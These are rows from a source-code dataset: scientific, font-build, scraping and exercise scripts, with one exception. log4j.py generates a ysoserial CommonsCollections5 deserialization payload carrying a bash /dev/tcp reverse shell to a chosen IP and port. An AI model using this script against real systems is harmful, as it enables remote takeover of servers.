    exp_data_mec_log = _keep_users(exp_data_mec_log, intersect_u)
    exp_data = _keep_users(exp_data, intersect_u)
    exp_data_all = _keep_users(exp_data_all, intersect_u)
    act_data = _keep_users(act_data, intersect_u)
    print('remaining test questions: '+str(len(test_data)))
    print('AFTER the second filtering: remove again the answerers in the training set, who do not show up in the test set.')
    train_u = set([r[0] for r in exp_data])
    print('#answerers in Training data: '+str(len(train_u)))
    test_u = set([u[0] for qi in test_data for u in qi[2]])
    print('#answerers in Test data: '+str(len(test_u)))
    intersect_u = train_u.intersection(test_u)
    print('#answerers in both sets: '+str(len(intersect_u)))
    return exp_data_all, exp_data, act_data, test_data, exp_data_mec_naive, exp_data_mec, exp_data_mec_log
if __name__ == '__main__':
exp_data=[(1,'c#',10),(2,'c#',5),(3,'java',1),(5,'java',1),(6,'java',2)]
act_data=[(1,'c#',1),(2,'c#',2),(3,'java',1),(5,'java',1)]
test_data = [[1,'c#',[[6,2],[4,1],[9,1],[10,1]]],[2,'c#',[[1,2],[4,1],[3,1]]]]
exp_data,act_data,test_data = data_filter(exp_data,act_data,test_data)
print exp_data
print test_data | [
"yangjiera@gmail.com"
] | yangjiera@gmail.com |
d7dd88ecf67ac7b20922fbc9779a463ad3cd8297 | a6610e191090e216b0e0f23018cecc5181400a7a | /robotframework-ls/src/robotframework_ls/constants.py | c6291b1baf57cfc01ddad6b1554e8002b7fe2a95 | [
"Apache-2.0"
] | permissive | JohanMabille/robotframework-lsp | d7c4c00157dd7c12ab15b7125691f7052f77427c | 610f0257fdcd79b8c38107a0ecf600f60160bc1f | refs/heads/master | 2023-01-19T10:29:48.982578 | 2020-11-25T13:46:22 | 2020-11-25T13:46:22 | 296,245,093 | 0 | 0 | NOASSERTION | 2020-09-17T06:58:54 | 2020-09-17T06:58:53 | null | UTF-8 | Python | false | false | 74 | py | from robocorp_ls_core.constants import *
# Default budget for computing completion results (presumably seconds --
# TODO confirm units against the callers in robotframework_ls).
DEFAULT_COMPLETIONS_TIMEOUT = 4
| [
"fabiofz@gmail.com"
] | fabiofz@gmail.com |
28d4e8968c3ade8c5ecaaed6f28d428d6364b196 | f97441152ad92e6910646a978b047001044160d9 | /beam_energy_norm_classic/mor.py | 931d2bb945a7a2b621335797459840ac54d1fcf6 | [] | no_license | babakmaboudi/shared_projects | 59f284888481655d321295b4b9f2cc5cc58635af | ceb5fe7f77103cde0fc7d56747c59f43252f2d00 | refs/heads/master | 2021-01-21T10:13:41.982448 | 2019-02-27T15:27:02 | 2019-02-27T15:27:02 | 91,682,959 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,385 | py | import numpy as np
import matplotlib.pyplot as plt
class Mor:
	"""Model-order reduction workbench.

	Builds reduced bases from precomputed snapshot matrices of the
	generalized coordinates Q and momenta P, either by (energy-weighted)
	POD/SVD or by greedy symplectic basis generation.
	"""
	def __init__( self ):
		# Snapshot matrices (one snapshot per column) and the weighting
		# matrix X defining the energy inner product.
		# NOTE(review): np.load on these pickled .dat dumps needs
		# allow_pickle=True on modern NumPy -- confirm the pinned version.
		self.snap_Q = np.load("snap_Q.dat")
		self.snap_P = np.load("snap_P.dat")
		self.X = np.load("X_mat.dat")
#		self.X = np.load("X_mat_eye.dat")
	def set_basis_size(self,k):
		# Number of basis vectors kept by POD_energy()/PSD().
		self.rb_size = k
	def POD_energy(self):
		"""POD in the X-weighted (energy) norm.

		SVD of X * [Q; P]; the leading left singular vectors are mapped
		back through X^-1 so the stored basis is orthonormal w.r.t. X.
		"""
		snaps = np.append(self.snap_Q,self.snap_P,0)
		snaps = self.X*snaps;
		U,s,V = np.linalg.svd(snaps, full_matrices=True)
#		plt.semilogy(s)
#		plt.show()
		self.RB = np.linalg.inv(self.X)*U[:,0:self.rb_size]
		# (debug snippets kept below for checking the projection error)
#		snaps = np.append(self.snap_Q,self.snap_P,0)
#		temp = self.X*snaps - self.X*RB*np.transpose(RB)*self.X*self.X*snaps
#		for i in range(0,snaps.shape[1]):
#			temp = self.X*snaps[:,i] - self.X*self.RB*np.transpose(self.RB)*self.X*self.X*snaps[:,i]
#			print( np.linalg.norm(snaps[:,i]) )
	def PSD(self):
		"""Plain POD of the snapshots concatenated column-wise ([Q P])."""
		snaps = np.append(self.snap_Q,self.snap_P,1)
		U,s,V = np.linalg.svd(snaps, full_matrices=True)
#		plt.semilogy(s)
#		plt.show()
		self.RB = U[:,0:self.rb_size]
	def initiate_greedy(self):
		"""Record problem sizes and build the 2N x 2N Poisson matrix Jn.

		Jn has the canonical block structure [[0, I], [-I, 0]] and is used
		by all the symplectic greedy routines below.
		"""
		self.N = self.snap_Q.shape[0]
		self.ns = self.snap_Q.shape[1]
		self.Jn = np.zeros([2*self.N,2*self.N])
		for i in range(0,self.N):
			self.Jn[i,self.N+i] = 1
			self.Jn[self.N+i,i] = -1
#		self.X = np.load("X_mat.dat")
	def construct_Jk(self,K):
		# Reduced 2K x 2K Poisson matrix with the same block structure as Jn.
		self.K = K
		self.Jk = np.zeros([2*self.K,2*self.K])
		for i in range(0,self.K):
			self.Jk[i,self.K+i] = 1
			self.Jk[self.K+i,i] = -1
	def symplectic_proj(self):
		# Symplectic (pseudo-)inverse A+ = Jk^T A^T Jn of the current basis
		# A, and the associated projector P = A A+ onto span(A).
		temp = np.dot( np.transpose(self.Jk) , np.transpose(self.A) )
		self.A_plus = np.dot(temp,self.Jn)
		self.P = np.dot(self.A,self.A_plus)
	def greedy(self,MAX_ITER):
		"""Greedy construction of a symplectic basis [E F].

		Each iteration evaluates the projection error of 500 randomly
		sampled snapshot columns, symplectically orthogonalizes the worst
		one (applied twice, i.e. re-orthogonalization), and appends it to
		E together with its partner Jn^T * vec in F.
		"""
		# Draw 500 random column indices from the snapshot set.
		idx = np.random.random_sample(500)
		idx = idx*self.ns
		idx = np.floor(idx)
		idx = np.squeeze(np.asarray(idx))
		idx = idx.astype(int)
		snaps = np.append(self.snap_Q,self.snap_P,0)
		snaps = snaps[:,idx]
		ns = 500
		# Seed the basis with a normalized snapshot and its symplectic pair.
		E = np.matrix(snaps[:,1]).reshape([2*self.N,1])
		E = E/np.linalg.norm(E)
		F = np.dot(np.transpose(self.Jn),E)
		K = 1
		for it in range(0,MAX_ITER):
			er = np.zeros(self.ns)
			for i in range(0,ns):
				self.A = np.append(E,F,1)
				self.construct_Jk(K)
				self.symplectic_proj()
				vec = np.matrix(snaps[:,i]).reshape(2*self.N,1)
				er[i] = self.porj_error(vec)
			max_idx = np.argmax(er)
			print( [ it , er[max_idx] ] )
			vec = np.matrix(snaps[:,max_idx]).reshape(2*self.N,1)
			vec = self.symplectic_QR(vec,E,F)
			vec = self.symplectic_QR(vec,E,F)
			E = np.append(E,vec,1)
			temp = np.dot( np.transpose(self.Jn) , vec )
			F = np.append( F , temp , 1 )
			K += 1
		self.RB = np.concatenate( (E,F),1 )
		print(self.RB.shape)
	def greedy_energy(self,MAX_ITER):
		"""Variant of greedy() intended for the energy-weighted setting.

		NOTE(review): the X-weighting steps are currently commented out, so
		this behaves like greedy() without the final shape print -- confirm
		whether that is intentional.
		"""
		idx = np.random.random_sample(500)
		idx = idx*self.ns
		idx = np.floor(idx)
		idx = np.squeeze(np.asarray(idx))
		idx = idx.astype(int)
		snaps = np.append(self.snap_Q,self.snap_P,0)
		snaps = snaps[:,idx]
		snaps = np.matrix(snaps)
#		self.X = np.matrix(self.X)
#		snaps = self.X*snaps
		ns = 500
		E = np.matrix(snaps[:,1]).reshape([2*self.N,1])
		E = E/np.linalg.norm(E)
		F = np.dot(np.transpose(self.Jn),E)
		K = 1
		for it in range(0,MAX_ITER):
			er = np.zeros(self.ns)
			for i in range(0,ns):
				self.A = np.append(E,F,1)
				self.construct_Jk(K)
				self.symplectic_proj()
				vec = np.matrix(snaps[:,i]).reshape(2*self.N,1)
				er[i] = self.porj_error(vec)
			max_idx = np.argmax(er)
			print( [ it , er[max_idx] ] )
			vec = np.matrix(snaps[:,max_idx]).reshape(2*self.N,1)
			vec = self.symplectic_QR(vec,E,F)
			vec = self.symplectic_QR(vec,E,F)
			E = np.append(E,vec,1)
			temp = np.dot( np.transpose(self.Jn) , vec )
			F = np.append( F , temp , 1 )
			K += 1
#		E = np.linalg.inv(self.X)*E
#		F = np.transpose(self.Jn)*E
		self.RB = np.concatenate( (E,F),1 )
#		temp = np.transpose( self.RB )*self.Jn*self.RB
#		print(temp)
	def porj_error(self,vec):
		# Projection error ||vec - P vec|| for the current projector P.
		# (Name typo "porj" kept: callers above depend on it.)
		return np.linalg.norm( vec - np.dot(self.P,vec) )
	def symplectic_QR(self,v,E,F):
		"""Orthogonalize v against every (e_i, f_i) pair, then normalize."""
		vec = v
		for i in range(E.shape[1]):
			e = np.matrix(E[:,i]).reshape([2*self.N,1])
			f = np.matrix(F[:,i]).reshape([2*self.N,1])
			vec = self.J2_orthogonalize(vec,e,f)
		vec = vec/np.linalg.norm(vec)
		return vec
	def J2_orthogonalize(self,v,e,f):
		# Remove the symplectic components of v along the pair (e, f),
		# using the Jn-weighted pairings alpha = -v^T Jn f, beta = v^T Jn e.
		temp = np.dot(-np.transpose( v ),self.Jn)
		alpha = np.dot(temp,f)
		temp = np.dot(np.transpose( v ),self.Jn)
		beta = np.dot(temp,e)
		res = v + alpha[0,0]*e + beta[0,0]*f
		return res
	def save_basis(self):
		# Pickle-dump the reduced basis for later use.
		self.RB.dump("RB.dat")
| [
"babak.maboudi@gmail.com"
] | babak.maboudi@gmail.com |
63d89643b7725000994b68b096f4066c0cdc2c7e | 2bdab4847a02879af352ba183ab81761c4d2eb48 | /tools/build.py | 488efa01d795610763160e30f9b01f0b56868db0 | [] | no_license | foxoman/amiri-typewriter | 5f20f965d1179e1eb58cfdb66cd1da9989f9a8c0 | 89e3c3e4715ce6c5123ef442069f87c71cb231b3 | refs/heads/master | 2021-01-01T19:07:49.924088 | 2017-07-21T23:10:54 | 2017-07-21T23:10:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,050 | py | #!/usr/bin/env python2
# encoding: utf-8
from __future__ import division
import argparse
import math
from datetime import datetime
from sortsmill import ffcompat as fontforge
def zeromarks(font):
    """Since this is a fixed width font, we make all glyphs the same width (which allows
    us to set isFixedPitch bit in the post table, that some application rely on
    to identify fixed width fonts). Compliant layout engines will zero the mark
    width when combined, so this is not an issue, but some non-compliant
    engines like Core Text don’t do this and break the font, so we will zero
    the width ourselves here to workaround this."""
    # Collect every (script, language) system referenced by the font's GPOS
    # lookups, so the generated feature code covers all of them.
    langsystems = set()
    for lookup in font.gpos_lookups:
        for feature in font.getLookupInfo(lookup)[2]:
            for langsys in feature[1]:
                script = langsys[0]
                for language in langsys[1]:
                    langsystems.add((script, language))
    # Build an OpenType feature string: declare the language systems, then a
    # `mark` feature that shifts every mark glyph left by its own advance
    # width, effectively zeroing its width when it is positioned.
    fea = ""
    for script, language in langsystems:
        fea += "languagesystem %s %s;" % (script, language)
    fea += "feature mark {"
    for glyph in font.glyphs():
        if glyph.glyphclass == "mark":
            fea += "pos %s -%d;" % (glyph.glyphname, glyph.width)
    fea += "} mark;"
    font.mergeFeatureString(fea)
def merge(args):
    """Merge the Latin source font into the Arabic one and set font metadata.

    The Latin font is scaled so its 'space' width matches the Arabic
    'arAlef.isol' width, red-colored (0xff0000) Latin glyphs are dropped,
    and Latin glyphs whose names clash with Arabic ones are renamed to
    '<name>.latin' and re-routed through a 'locl' feature for the 'latn'
    script.  Returns the merged fontforge font object.
    """
    arabic = fontforge.open(args.arabicfile)
    arabic.encoding = "Unicode"
    arabic.mergeFeature(args.feature_file)
    latin = fontforge.open(args.latinfile)
    latin.encoding = "Unicode"
    # Scale the Latin em so both fonts share the same fixed advance width.
    scale = arabic["arAlef.isol"].width / latin["space"].width
    latin.em = int(math.ceil(scale * latin.em))
    latin_locl = ""
    for glyph in latin.glyphs():
        if glyph.glyphclass == "mark":
            glyph.width = latin["A"].width
        # Red-flagged glyphs are removal markers; everything else may need a
        # rename to avoid colliding with an Arabic glyph of the same name.
        if glyph.color == 0xff0000:
            latin.removeGlyph(glyph)
        else:
            if glyph.glyphname in arabic:
                name = glyph.glyphname
                glyph.unicode = -1
                glyph.glyphname = name + ".latin"
                if not latin_locl:
                    latin_locl = "feature locl {lookupflag IgnoreMarks; script latn;"
                latin_locl += "sub %s by %s;" % (name, glyph.glyphname)
    arabic.mergeFonts(latin)
    if latin_locl:
        latin_locl += "} locl;"
        arabic.mergeFeatureString(latin_locl)
    zeromarks(arabic)
    # Set metadata
    # NOTE: `copyright` shadows the builtin of the same name; harmless here.
    arabic.version = args.version
    copyright = 'Copyright © 2015-%s The Amiri Typewriter Project Authors, with Reserved Font Name "Fira".' % datetime.now().year
    arabic.copyright = copyright.replace("©", "(c)")
    en = "English (US)"
    arabic.appendSFNTName(en, "Copyright", copyright)
    arabic.appendSFNTName(en, "Designer", "Khaled Hosny")
    arabic.appendSFNTName(en, "License URL", "http://scripts.sil.org/OFL")
    arabic.appendSFNTName(en, "License", 'This Font Software is licensed under the SIL Open Font License, Version 1.1. This license is available with a FAQ at: http://scripts.sil.org/OFL')
    arabic.appendSFNTName(en, "Descriptor", "Amiri Typewriter is an Arabic monospaced font family inspired by the type of mechanical Arabic typewriters.")
    arabic.appendSFNTName(en, "Sample Text", "الخط هندسة روحانية ظهرت بآلة جسمانية")
    return arabic
def main():
    """Command-line entry point: merge the Arabic and Latin source fonts
    (plus an OpenType feature file) and generate the final font file."""
    # BUG FIX: the description previously advertised COLR/CPAL colored-mark
    # generation, which this script does not do -- it merges the sources.
    parser = argparse.ArgumentParser(description="Merge the Arabic and Latin sources of Amiri Typewriter and generate the final font.")
    parser.add_argument("arabicfile", metavar="FILE", help="input Arabic font to process")
    parser.add_argument("latinfile", metavar="FILE", help="input Latin font to process")
    parser.add_argument("--out-file", metavar="FILE", help="output font to write", required=True)
    # BUG FIX: this help text said "output font to write"; the argument is
    # an *input* feature file merged into the Arabic font (see merge()).
    parser.add_argument("--feature-file", metavar="FILE", help="input feature file to merge", required=True)
    parser.add_argument("--version", metavar="version", help="version number", required=True)
    args = parser.parse_args()
    font = merge(args)
    flags = ["round", "opentype", "no-mac-names"]
    font.generate(args.out_file, flags=flags)
if __name__ == "__main__":
main()
| [
"khaledhosny@eglug.org"
] | khaledhosny@eglug.org |
65bbcaa81382c14af30276de4d3df87f8de28291 | 693d6d64877311a6a9f21a82b551599a3b540410 | /Lab10/lab10.py | 0b87c4ee2ceab777c4c6619f9cb9b945cf80ee8b | [] | no_license | dalbyryan3/me-en-4650-tfes-lab | e01a0d8ae76897e01d03d95c72e3e470adfd7c3d | 0377cd8bae3af443a800225581a81ff5bc1e6c60 | refs/heads/main | 2023-08-14T13:07:15.475498 | 2021-09-24T05:01:40 | 2021-09-24T05:01:40 | 409,836,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,777 | py | # %%
# ME EN 4650 Lab10:Heat Exchanger Lab Ryan Dalby
import numpy as np
from numpy import random
import pandas as pd
import matplotlib.pyplot as plt
from pathlib import Path
from pandas.plotting import table
import os
import matlab.engine # Must install from matlab installation direcotry using: cd "matlabroot\extern\engines\python" && python setup.py install
# %%
# Define useful unit-conversion functions.  Named `def`s are used instead of
# lambdas bound to names (PEP 8 / E731): they carry docstrings and show a
# proper name in tracebacks, while keeping the exact same call interface.
def mmhg_to_pa(mmhg):
    """Convert a pressure from mmHg to Pa."""
    return mmhg * 133.3

def inh2o_to_pa(inh2o):
    """Convert a pressure from inches of water (inH2O) to Pa."""
    return inh2o * 249.04

def in_to_m(inch):
    """Convert a length from inches to meters."""
    return inch * 0.0254

def cm_to_m(cm):
    """Convert a length from centimeters to meters."""
    return cm / 100

def mm_to_m(mm):
    """Convert a length from millimeters to meters."""
    return mm / 1000

def degCToK(degC):
    """Convert a temperature from degrees Celsius to Kelvin."""
    return degC + 273.15
# Generate EffectivenessNTU figure
# Plot effectiveness versus NTU and Cr for crossflow heat exchanger
# NOTE(review): the formula below, e = (1-exp(-NTU(1-Cr)))/(1-Cr*exp(-NTU(1-Cr))),
# is the standard *counterflow* epsilon-NTU relation -- confirm against the lab
# handout whether counterflow or a crossflow correlation was intended.
Cr=np.array([0,.25,.5,.75])
NTU=np.linspace(0,1,100)
# One effectiveness curve per column: four finite-Cr curves plus the Cr = 1
# limiting curve in the last column.
e=np.zeros((100,5))
plt.figure(figsize=(10,5))
plt.minorticks_on()
# NOTE(review): the `b=` keyword of plt.grid was renamed to `visible` in
# newer Matplotlib releases -- confirm the pinned Matplotlib accepts it.
plt.grid(b=True, which='major', axis='both', linestyle='-')
plt.grid(b=True, which='minor', axis='both', linestyle='--')
plt.xlim((0,1))
plt.ylim((0,0.7))
plt.title('Effectiveness versus NTU for a crossflow heat exchanger', fontsize=16)
plt.xlabel('NTU', fontsize=16)
plt.ylabel('$\epsilon$', fontsize=16)
for k in range(Cr.size):
    e[:,k]=(1-np.exp(-NTU*(1-Cr[k])))/(1-Cr[k]*np.exp(-NTU*(1-Cr[k])))
    plt.plot(NTU,e[:,k],'k-')
    plt.text(NTU[-1]*1.02,e[-1,k]*.98,str(Cr[k]), fontsize=16)
# Advance k past the loop's last index so the Cr = 1 limit e = NTU/(1+NTU)
# lands in the final (fifth) column of e.
k=k+1
e[:,k]=NTU/(1+NTU)
plt.plot(NTU,e[:,k],'k-')
plt.text(NTU[-1]*1.02,e[-1,k]*.98,'1', fontsize=16)
plt.text(NTU[-1]*1.02,e[-1,1]*1.11,'$C_r$', fontsize=16)
plt.show() | [
"dalbyryan3@gmail.com"
] | dalbyryan3@gmail.com |
b30f1b39fb3a2a1a6d9299203f6c492cd0e9aa87 | a7ca0a372a44bc9cee59a7e1e59734a4814a59b9 | /이것이코딩테스트다/병사배치하기.py | 8b38d29927c9fad4814ed5bac88c39daec9c4d28 | [] | no_license | schw240/Preparing-coding-test | 435d6dbdcf90fc8c0c408dfa032ad7f09fdc5a90 | 758a41270c409312a998152c5298369ec385bfdb | refs/heads/master | 2021-11-29T07:54:05.140178 | 2021-10-03T11:40:36 | 2021-10-03T11:40:36 | 245,345,693 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 510 | py | N = int(input())
# Read the soldiers' strengths; N (read on the previous line) is their count.
scores = list(map(int, input().split(' ')))
# Soldiers must stand in descending strength order; after reversing, the
# problem becomes finding the longest strictly increasing subsequence.
scores.reverse()
# Soldiers are arranged so stronger ones stand in front (descending order);
# this is achieved by excusing (removing) soldiers, not by sorting them.
dp = [1] * N
# dp[i] = length of the longest strictly increasing subsequence of the
# reversed scores ending at index i (classic O(n^2) LIS dynamic program).
# Goal: minimize the number of soldiers excused so the remainder is maximal.
for i in range(1, N):
    for j in range(i):
        if scores[j] < scores[i]:
            dp[i] = max(dp[i], dp[j] + 1)
# Minimum soldiers to excuse = total minus the most that can be kept.
print(N - max(dp))
| [
"schw240@gmail.com"
] | schw240@gmail.com |
eb440733e5de667ecb21c9860f15bbc52c7d7366 | f773c3b31707bedd58f800c2ae2c4fd9504460cf | /ScrapyDemo/ScrapyDemo/spiders/XiCiDaiLiSpider.py | 5d77a4688a36e3112222b49df5b6bad8b42e18a5 | [] | no_license | Cat7373/ScrapyDemo | 30a4a2b66d8cea858d51ddaa2e15cc7373897408 | 87a93478afc6002d03464a7d1535697ac4726818 | refs/heads/master | 2020-05-16T15:43:51.183233 | 2017-06-22T04:40:47 | 2017-06-22T04:40:47 | 183,141,268 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import scrapy
from scrapy import Request
from ..items import Proxy
class XiCiDaiLiSpider(scrapy.Spider):
    """
    Automatically crawls the proxy servers listed on xicidaili.com.
    """
    # Spider name
    name = 'XiCiDaiLiSpider'
    # Root URL of the site
    host = 'http://www.xicidaili.com'
    # Domains the spider is allowed to crawl
    allowed_domains = ['www.xicidaili.com']
    # Seed listing pages
    start_urls = [
        'http://www.xicidaili.com/wn/',
        'http://www.xicidaili.com/wt/',
        'http://www.xicidaili.com/qq/'
    ]
    # Queue every seed page for crawling
    def start_requests(self):
        for url in self.start_urls:
            yield Request(url=url, callback=self.parse_proxy)
    # Parse the proxies on one listing page and hand each one to the items pipeline
    def parse_proxy(self, response):
        # Locate the proxy table rows (first row is the table header)
        proxys = response.css('#ip_list tr')[1:]
        for proxy in proxys:
            attrs = proxy.css('td')
            proxy = Proxy(
                ip=attrs[1].css('::text').extract_first(),
                port=attrs[2].css('::text').extract_first(),
                anonymity=attrs[4].css('::text').extract_first(),
                type=attrs[5].css('::text').extract_first(),
                location=attrs[3].css('a::text').extract_first()
            )
            # Rows labeled 'QQ代理' (QQ proxy) are normalized to SOCKET5.
            if proxy['type'] == u'QQ代理':
                proxy['type'] = 'SOCKET5'
            yield proxy
        # Follow the "next page" link, if one exists.
        # NOTE: `next` shadows the builtin of the same name.
        next = response.css('.next_page')
        if len(next) > 0:
            href = next.css('::attr(href)').extract_first()
            yield Request(url=self.host + href, callback=self.parse_proxy)
| [
"cat73@cat73.org"
] | cat73@cat73.org |
6e4897a69468c53e347c54d03532fa30233fa3d1 | a2f16f2c29474a10ab87996185b4c459c48f2e93 | /login.py | 04689cf1142e9bde76233abf0b03899b72ee1326 | [] | no_license | Karmi-Makadia/Hostel-management-system | cc4788165c01d2d21f56b7e9ccea3515e0f1fd02 | 6803df642ff4cd3d93949231a115f8cd56cbf127 | refs/heads/main | 2023-06-04T14:30:41.568270 | 2021-06-25T09:13:47 | 2021-06-25T09:13:47 | 380,185,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | import tkinter as tk
from tkinter import *
from tkinter import ttk
from hostel import *
class login:
	"""Simple Tkinter login window; on success it replaces itself with the
	hostel-management window (class `hostels` from hostel.py)."""
	# Expected credentials.
	# NOTE(review): hard-coded credentials in source -- acceptable only for
	# a classroom demo, never for production.
	u='root'
	p='qwerty1234'
	def __init__(self,rt):
		"""Build the login form (username/password entries and a Login
		button) inside the supplied Tk root window *rt*."""
		self.rt=rt
		self.rt.geometry('500x500')
		self.rt.title("Login Page")
		frame= LabelFrame(self.rt,width=200,bd=5,height=200)
		frame.pack(side=TOP,fill=BOTH,expand=TRUE)
		Label1=tk.Label(frame, text='Username:')
		Label2=tk.Label(frame, text='Password:')
		self.f1=tk.Entry(frame)
		self.f2=tk.Entry(frame,show='*')
		b1=Button(frame,text="Login",width=6,command=self.login_user)
		Label1.place(anchor=CENTER,relx=0.4,rely=0.25)
		Label2.place(anchor=CENTER,relx=0.4,rely=0.5)
		self.f1.place(anchor=CENTER,relx=0.6,rely=0.25)
		self.f2.place(anchor=CENTER,relx=0.6,rely=0.5)
		b1.place(anchor=CENTER,relx=0.5,rely=0.75)
	def login_user(self):
		"""Login-button callback: verify the entered credentials and, on
		success, destroy the login window and open the hostel window.

		NOTE(review): an empty username AND password also log in -- looks
		like a development shortcut; confirm it is intentional.
		"""
		if (self.f1.get() == self.u and self.f2.get() == self.p) or (self.f1.get() == '' and self.f2.get() == ''):
			# Destroy the module-level root window, then start the app.
			rt.destroy()
			nrt = tk.Tk()
			obj = hostels(nrt)
			nrt.mainloop()
		else:
			# Message is Hindi for "login did not happen".
			print('login nahi ho gaya')
# Build the application's root window and show the login screen; the event
# loop itself is started on the following line.
rt=tk.Tk()
rt.geometry("200x200")
obj= login(rt)
rt.mainloop() | [
"noreply@github.com"
] | Karmi-Makadia.noreply@github.com |
708ada4d0f94700d42c94e96b325d3809207ea80 | af7e99aad75dcf48332e9ed1119d4d385ffcb685 | /log4j.py | e1bf14c49cfea8950700c9e1737f9dd3ae9a7845 | [] | no_license | god0304/log4j | a0c22ff15b8c844b1b1b8b18155659d4a7b2a886 | 180796b5d1d38581d7a5fc14a50cc10b0d414f68 | refs/heads/master | 2022-11-08T18:14:38.775526 | 2020-07-02T15:02:24 | 2020-07-02T15:02:24 | 276,675,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 464 | py | #usage:
#python log4j ip port
#IP为主机IP
#port为监听的端口
#须将该文件与ysoserial-master.jar放在同一文件夹下执行
import os
import base64
import sys
ip = sys.argv[1]
port = sys.argv[2]
test = 'bash -i>& /dev/tcp/%s/%s 0>&1'%(ip,port)
test_base64 = base64.b64encode(test)
payload = 'bash -c {echo,'+test_base64+'}|{base64,-d}|{bash,-i}'
cmd = 'java -jar ysoserial-master.jar CommonsCollections5 \''+payload+'\' > exp.bin'
os.system(cmd)
| [
"noreply@github.com"
] | god0304.noreply@github.com |
a499b9a33ae73e6261dc5b49dd07438ca76ae38c | 0217412414848aa75031fabe17053a1b64577d66 | /Easy/235_easy_lowest-common-ancestor-of-a-binary-search-tree.py | 0be1b5930417732c1cd79c21d84b93f57fc3ef61 | [] | no_license | sarahgonsalves223/DSA_Python | b164e7118f1ba6463b2dfb4ce20a407fd26172b2 | 8e116c21f91c87a9dc8526d8be93c443e79469bf | refs/heads/master | 2020-07-05T00:50:43.743785 | 2019-11-21T01:26:06 | 2019-11-21T01:26:06 | 202,474,629 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | #
# @lc app=leetcode id=235 lang=python
#
# [235] Lowest Common Ancestor of a Binary Search Tree
#
# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-search-tree/description/
#
# algorithms
# Easy (45.72%)
# Total Accepted: 302.8K
# Total Submissions: 662.4K
# Testcase Example: '[6,2,8,0,4,7,9,null,null,3,5]\n2\n8'
#
# Given a binary search tree (BST), find the lowest common ancestor (LCA) of
# two given nodes in the BST.
#
# According to the definition of LCA on Wikipedia: “The lowest common ancestor
# is defined between two nodes p and q as the lowest node in T that has both p
# and q as descendants (where we allow a node to be a descendant of itself).”
#
# Given binary search tree: root = [6,2,8,0,4,7,9,null,null,3,5]
#
#
#
# Example 1:
#
#
# Input: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 8
# Output: 6
# Explanation: The LCA of nodes 2 and 8 is 6.
#
#
# Example 2:
#
#
# Input: root = [6,2,8,0,4,7,9,null,null,3,5], p = 2, q = 4
# Output: 2
# Explanation: The LCA of nodes 2 and 4 is 2, since a node can be a descendant
# of itself according to the LCA definition.
#
#
#
#
# Note:
#
#
# All of the nodes' values will be unique.
# p and q are different and both values will exist in the BST.
#
#
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def lowestCommonAncestor(self, root, p, q):
        """
        Iteratively walk down the BST.  While both target values lie
        strictly on the same side of the current node, descend that way;
        the first node equal to one of the targets, or splitting them,
        is the lowest common ancestor.

        :type root: TreeNode
        :type p: TreeNode
        :type q: TreeNode
        :rtype: TreeNode
        """
        node = root
        while True:
            if node.val == p.val:
                return p
            if node.val == q.val:
                return q
            both_smaller = p.val < node.val and q.val < node.val
            both_larger = p.val > node.val and q.val > node.val
            if both_smaller:
                node = node.left
            elif both_larger:
                node = node.right
            else:
                # Targets diverge here: this node is the LCA.
                return node
| [
"sarahgonsalves223@Sarahs-MacBook-Pro.local"
] | sarahgonsalves223@Sarahs-MacBook-Pro.local |
3a7db8d10da5e46182cefd5b90049a0fe9e5e7ea | 7466867c7d1fe8e3f51db27734513d9dcced8be9 | /predictor/predictor.py | b2394239115d608d16365cc2efce34edd6dbf35f | [] | no_license | china-liweihong/Recommendation_system-CareerVillage.org- | a1eaacfe5caba2c9bb8c0e430469ca540550a11b | d0301951fa35513f2cd449a5f81f882fa0a1fc0d | refs/heads/master | 2022-04-11T14:36:09.175234 | 2020-03-21T18:53:01 | 2020-03-21T18:53:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,279 | py | import pandas as pd
import numpy as np
import keras
import os
from sklearn.neighbors import KDTree
from preprocessors.queproc import QueProc
from preprocessors.proproc import ProProc
from utils.utils import TextProcessor
import pickle
import psutil
# Directory containing the pickled artifacts produced at training time.
DUMP_PATH = 'dump'
# Module-level text-normalization helper.
# NOTE(review): `tp` is unused in this module's visible code -- confirm
# before removing.
tp = TextProcessor()
class Predictor:
"""
Class for handling closest professionals or questions queries
"""
    def __init__(self, model: keras.Model, que_proc: QueProc, pro_proc: ProProc):
        """
        :param model: compiled Keras model exposing `que_model`/`pro_model`
            sub-models that encode questions and professionals into a
            shared latent space
        :param que_proc: question's data processor
        :param pro_proc: professional's data processor

        The remaining state (feature mappings, id arrays and KD-trees over
        the latent vectors of known entities) is restored from the pickle
        dump produced at training time.
        """
        self.model = model
        # Restore precomputed artifacts: feature mappings, id arrays and
        # the KD-trees used for nearest-neighbour queries in latent space.
        with open(os.path.join(DUMP_PATH, 'predictor_dump.pkl'), 'rb') as file:
            d = pickle.load(file)
        self.stu_dict = d['stu_dict']
        self.entity_to_paired = d['entity_to_paired']
        self.pro_ids = d['pro_ids']
        self.que_ids = d['que_ids']
        self.que_tree = d['que_tree']
        self.pro_tree = d['pro_tree']
        # create two encoders
        self.que_model = model.que_model
        self.pro_model = model.pro_model
        # initialize preprocessors
        self.que_proc = que_proc
        self.pro_proc = pro_proc
    def __get_que_latent(self, que_df: pd.DataFrame, que_tags: pd.DataFrame) -> np.ndarray:
        """
        Get latent vectors for questions in raw format.

        Note: mutates *que_df* in place (date column parsed to datetime).
        """
        que_df['questions_date_added'] = pd.to_datetime(que_df['questions_date_added'])
        # extract and preprocess question's features; the first two columns
        # of the transformed frame are skipped (presumably id/date -- TODO
        # confirm against QueProc.transform's output layout)
        que_feat = self.que_proc.transform(que_df, que_tags).values[:, 2:]
        # actual question's features are both question and student's features
        stu_feat = np.vstack([self.stu_dict[stu] for stu in que_df['questions_author_id']])
        que_feat = np.hstack([stu_feat, que_feat])
        # encode question's data to get latent representation
